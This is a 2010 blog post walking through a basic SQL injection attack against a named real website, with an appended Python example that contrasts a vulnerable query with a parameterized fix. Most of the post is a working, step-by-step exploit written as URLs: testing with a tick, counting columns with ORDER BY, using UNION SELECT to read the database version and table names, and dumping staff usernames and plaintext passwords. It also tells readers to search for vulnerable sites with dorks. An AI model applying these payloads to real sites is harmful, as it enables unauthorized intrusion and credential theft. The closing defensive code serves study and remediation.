Friday, 3 September 2010

Basic SQL Injection

Basic SQL injection walkthrough using bizjournal.com as the example (it is not vulnerable now).
You can find many vulnerable websites using this kind of dork (click here for SQL injection dorks).

Code:
http://www.bizjournal.com/content/article.php?id=124

The first thing you'll do is point your browser to that URL and add a tick (a single quote) at the end of it.

Code:
http://www.bizjournal.com/content/article.php?id=124'

Success! You will get the valuable SQL error that you're looking for.

Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\' ORDER BY id ASC LIMIT 0, 1' at line 1

Now it is time to discover how many columns the vulnerable query returns.
The easiest way to do this is with the SQL "ORDER BY" clause.
There are many other ways to do this, but this is the way I use.
To do it, take the URL and add "order by 1--" to the end:

Code:
http://www.bizjournal.com/content/article.php?id=124 order by 1--

You'll notice that the site loads normally, because the query returns at least one column.
The next thing is to make the id a negative integer so that the page's normal content doesn't load, which makes it much cleaner to see what you're doing.

Code:
http://www.bizjournal.com/content/article.php?id=-124 order by 1--

Notice that the id is now a negative 124: "-124".

Now it's time to find out exactly how many columns it has. You do this by increasing the order by number until the page errors:

Code:
http://www.bizjournal.com/content/article.php?id=-124 order by 1--
http://www.bizjournal.com/content/article.php?id=-124 order by 2--
http://www.bizjournal.com/content/article.php?id=-124 order by 3--
http://www.bizjournal.com/content/article.php?id=-124 order by 4--
http://www.bizjournal.com/content/article.php?id=-124 order by 5--
http://www.bizjournal.com/content/article.php?id=-124 order by 6--
http://www.bizjournal.com/content/article.php?id=-124 order by 7--
http://www.bizjournal.com/content/article.php?id=-124 order by 8--
http://www.bizjournal.com/content/article.php?id=-124 order by 9--
http://www.bizjournal.com/content/article.php?id=-124 order by 10--
http://www.bizjournal.com/content/article.php?id=-124 order by 11--
Success! It errors on "order by 11--" because the query doesn't have 11 columns.
So now that we know we have exactly 10 columns, we move on to a new statement: "UNION SELECT ALL".
This can be done a number of ways too, but this is the way I do it.

Code:
http://www.bizjournal.com/content/article.php?id=-124 union select all 1,2,3,4,5,6,7,8,9,10--

This appends a row made of our numbers to the result, and the page shows which of the 10 column positions it actually displays.
Notice that columns 2, 3 and 4 are displayed on the page.
The next step will be to get the website's database version. We do this by putting "@@version" in place of one of the numbers that is displayed; I will use 4.

Code:
http://www.bizjournal.com/content/article.php?id=-124 union select all 1,2,3,@@version,5,6,7,8,9,10--

This will return the database version on the page where the number 4 was displayed.
Our version is:
5.0.67-log

The next step is to get the table names. This is where a lot of tutorials fall short: the simple
from information_schema.tables--
will not list just the user-created tables; it will show you a lot of garbage such as CHARACTER_SETS, COLLATIONS, etc.
What we will do instead is add a WHERE clause to that code:
from information_schema.tables WHERE table_schema=database()--

To make this work on the page we need to use the "group_concat" function, which joins all the table names into the one displayed column:
group_concat(table_name)

For columns:
group_concat(column_name)

Example:

Code:
http://www.bizjournal.com/content/article.php?id=-124 union select all 1,2,3,group_concat(table_name),5,6,7,8,9,10 from information_schema.tables where table_schema=database()--

Ahh, now we have the user-created table names:

Code:
archives,articles,articles2,digest,edition,events,links,nomination,sections,staff,survey

Now you need to look at the table names and decide which one would hold sensitive data; to me "staff" looks like a good choice.
Remember that one for a minute.

Next we will get the column names from the database with:
group_concat(column_name) from information_schema.columns where table_schema=database()--


Code:
id,date,title,by,abstract,body,section,keywords,photo,id,date,title,author,abstract,body,section,keywords,
photo,caption,caption2,caption3,caption4,lead,id,date,title,author,abstract,body,section,keywords,photo,
caption,caption2,caption3,caption4,lead,id,date,title,city,body,id,volume,number,date,id,title,body,
month,day,year,date,time,time2,location,cost,contact,phone,email,url,approved,id,url,title,category,
description,id,date,nominator,nominatortitle,nominatorcompany,nominatoraddress,nominatorcity,
nominatorstate,nominatorzip,nominatorphone,nominatorfax,nominatoremail,nomineecompany,nomineeaddress,
nomineecity,nomineestate,nomineezip,nomineephone,nomineefax,nomineeweb,reason,reasonother,sat1,sat2,sat3,
sat4,sat5,ethics1,ethics2,ethics3,ethics4,contrib1,contrib2,contrib3,contrib4,dev1,dev2,dev3,dev4,dev5,
dev6,dev7,dev8,dev9,lead1,lead2,lead3,lead4,lead5,lead6,quality1,quality2,contact1name,contact1title,
contact1phone,contact1email,contact2name,contact2title,contact2phone,contact2email,contact3name,
contact3title,c

Now you need to sift through these column names and find the ones of interest to us. But what happens when you don't see a column like username or password?

Well, sometimes the list will be cut off; notice the "contact3title,c" at the end. That is because MySQL truncates group_concat output at group_concat_max_len, which is 1024 bytes by default, so columns from the later tables never make it onto the page.
Now it's time to do a little guessing; this time it's easier than most, since username and password are both very common column names.

So to check the columns we will use "group_concat" again, but with our guessed column names, and instead of:
from information_schema.tables where table_schema=database()--
we will use:
from staff--
Remember the table name from earlier.

To give you an idea, a query with wrong column names (it will just error) looks like this:
Note: 0x3a is the hex code for the colon ":", used here as a separator between the two values.

Code:
http://www.bizjournal.com/content/article.php?id=-124 union select all 1,2,3,group_concat(user,0x3a,pass),5,6,7,8,9,10 from staff--

Now we will try username and password:

Code:
http://www.bizjournal.com/content/article.php?id=-124 union select all 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10 from staff--

Bingo! The query returns a list of staff usernames and passwords, and the passwords aren't even hashed.

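A defender's view of the same bug, as an added example that is not the original post's code: the unsafe pattern behind article.php?id=, a fixed version that validates and binds the id, and a probe that feeds both the inputs used in the walkthrough. The tables and rows are constructed in an in-memory SQLite database, so the MySQL-only @@version and information_schema steps are not reproduced.

```python
import sqlite3

# Constructed stand-in for the article and staff tables (sample data, not the site's).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE articles (id INTEGER, title TEXT, body TEXT);
        CREATE TABLE staff (username TEXT, password TEXT);
        INSERT INTO articles VALUES (124, 'Local news', 'Article body');
        INSERT INTO staff VALUES ('editor', 'placeholder-secret');
    """)
    return conn

def fetch_article_vulnerable(conn, raw_id):
    # The bug: the query-string value is pasted straight into the statement
    # (assumed unquoted numeric form; the tick still breaks the syntax).
    sql = (f"SELECT id, title, body FROM articles WHERE id = {raw_id} "
           "ORDER BY id ASC LIMIT 0, 1")
    return conn.execute(sql).fetchall()

def fetch_article_safe(conn, raw_id):
    # The fix, in two layers: reject anything that is not an integer, then bind
    # the value as a parameter so the driver never interprets it as SQL.
    try:
        article_id = int(raw_id)
    except (TypeError, ValueError):
        return None  # bad input: refuse it instead of letting the database error out
    sql = "SELECT id, title, body FROM articles WHERE id = ? ORDER BY id ASC LIMIT 0, 1"
    return conn.execute(sql, (article_id,)).fetchall()

def probe(raw_id):
    """Run one id value through both handlers and return what each produced."""
    conn = make_db()
    try:
        vuln = fetch_article_vulnerable(conn, raw_id)
    except sqlite3.OperationalError as exc:
        # This is the error message the walkthrough relies on; a hardened page
        # logs it server-side and never shows it to the visitor.
        vuln = f"SQL error leaked: {exc}"
    safe = fetch_article_safe(conn, raw_id)
    return vuln, safe

if __name__ == "__main__":
    for value in ("124", "124'",
                  "-124 union select all 1, username, password from staff--"):
        vuln, safe = probe(value)
        print(f"{value!r}\n  vulnerable -> {vuln}\n  safe       -> {safe}")
```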

There you go, that is the basics of MySQL injection. I really hope I helped you out; if I did, then reply back with a thanks :)
